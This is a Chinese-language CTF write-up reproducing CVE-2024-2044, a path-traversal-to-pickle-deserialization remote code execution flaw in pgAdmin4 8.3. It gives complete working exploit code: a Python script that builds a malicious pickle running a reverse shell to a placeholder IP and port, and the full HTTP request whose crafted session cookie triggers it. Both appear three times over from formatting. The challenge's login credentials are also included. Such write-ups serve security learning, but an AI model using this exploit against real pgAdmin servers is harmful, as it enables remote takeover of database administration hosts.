NKCTF
![图片[1],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/03/20240325161605197.png?imageView2/0/format/webp/q/75)
cve复现详细链接
https://www.shielder.com/advisories/pgadmin-path-traversal_leads_to_unsafe_deserialization_and_rce/
打比赛时也找到了这篇文章,当时用的nc和sh反弹shell失败,遂炸裂,百思不得其解,赛后复盘失败原因
解决办法:用python shell命令弹(感谢出题人seizer,感谢晨曦师傅指点,
->晨曦师傅的博客https://chenxi9981.github.io/
![图片[2],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/03/20240325155818458.png?imageView2/0/format/webp/q/75)
复现过程
在这篇文章当中linux提到必须有账号密码
比赛的时是用的linux环境,
比赛登录账号是:tacooooo@qq.com
密码猜测是:tacooooo
从这场比赛中我又坚定了密码不一定是弱密码,有可能与出题人的相关的这种情况
![图片[3],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/03/20240325155942241.png?imageView2/0/format/webp/q/75)
登录
![图片[4],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/03/20240325160117252.png?imageView2/0/format/webp/q/75)
根据提示进行下一步上传文件
![图片[5],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/03/20240325160213519.png?imageView2/0/format/webp/q/75)
上传文件所需要的python文件如下
exp:
import pickleimport osimport pickletoolsclass exp():def __reduce__(self):return (exec, ("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);",))if __name__ == '__main__':c = exp()payload = pickle.dumps(c)with open('posix.pickle', 'wb') as f:f.write(payload)import pickle import os import pickletools class exp(): def __reduce__(self): return (exec, ("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);",)) if __name__ == '__main__': c = exp() payload = pickle.dumps(c) with open('posix.pickle', 'wb') as f: f.write(payload)import pickle import os import pickletools class exp(): def __reduce__(self): return (exec, ("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"yourip\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);",)) if __name__ == '__main__': c = exp() payload = pickle.dumps(c) with open('posix.pickle', 'wb') as f: f.write(payload)
此py文件将会生成posix.pickle文件
上传
![图片[6],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/03/20240325160325499.png?imageView2/0/format/webp/q/75)
![图片[7],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/03/20240325160408324.png?imageView2/0/format/webp/q/75)
抓包修改cookie
如果反弹成功是不响应的,此时未响应即反弹成功
![图片[8],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/03/20240325160746351.png?imageView2/0/format/webp/q/75)
拿flag:
![图片[9],PgAdmin4 8.3反序列化&&rceCVE-2024-2044复现,网络安全爱好者中心-神域博客网](https://img.godyu.com/2024/03/20240325161007287.png?imageView2/0/format/webp/q/75)
POC:
POST /settings/save_tree_state/ HTTP/1.1Host: 3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cnContent-Length: 2X-pgA-CSRFToken: IjE0MGE3MTVmMmIzMDgwYmYwOTJmNGU5ZjUyOWJlNTQ1OTcwZTdhNDki.ZgGgmA.YDRgzezGzIulLQT1YgWn_A7Bv5cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0Content-type: application/jsonAccept: */*Origin: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cnReferer: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn/browser/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: pga4_session=../storage/tacooooo_qq.com/posix.pickle!a; PGADMIN_LANGUAGE=enConnection: close{}POST /settings/save_tree_state/ HTTP/1.1 Host: 3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn Content-Length: 2 X-pgA-CSRFToken: IjE0MGE3MTVmMmIzMDgwYmYwOTJmNGU5ZjUyOWJlNTQ1OTcwZTdhNDki.ZgGgmA.YDRgzezGzIulLQT1YgWn_A7Bv5c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 Content-type: application/json Accept: */* Origin: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn Referer: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn/browser/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: pga4_session=../storage/tacooooo_qq.com/posix.pickle!a; PGADMIN_LANGUAGE=en Connection: close {}POST /settings/save_tree_state/ HTTP/1.1 Host: 3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn Content-Length: 2 X-pgA-CSRFToken: IjE0MGE3MTVmMmIzMDgwYmYwOTJmNGU5ZjUyOWJlNTQ1OTcwZTdhNDki.ZgGgmA.YDRgzezGzIulLQT1YgWn_A7Bv5c User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0 Content-type: application/json Accept: */* Origin: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn Referer: http://3a1ff75c-5a37-4834-b6ed-22d3d3738c7d.node.nkctf.yuzhian.com.cn/browser/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 Cookie: pga4_session=../storage/tacooooo_qq.com/posix.pickle!a; PGADMIN_LANGUAGE=en Connection: close {}
尾言
关于此题,部分师傅用nc反弹成功,但我在打比赛和赛后用nc反弹均失败,也排查了vps问题,在本地用不同vps互相nc反弹可以成功,但这道题无法反弹,如果师傅们用nc无法反弹建议用上面的exp生成用python命令反弹shell.
THE END
- 最新
- 最热
只看作者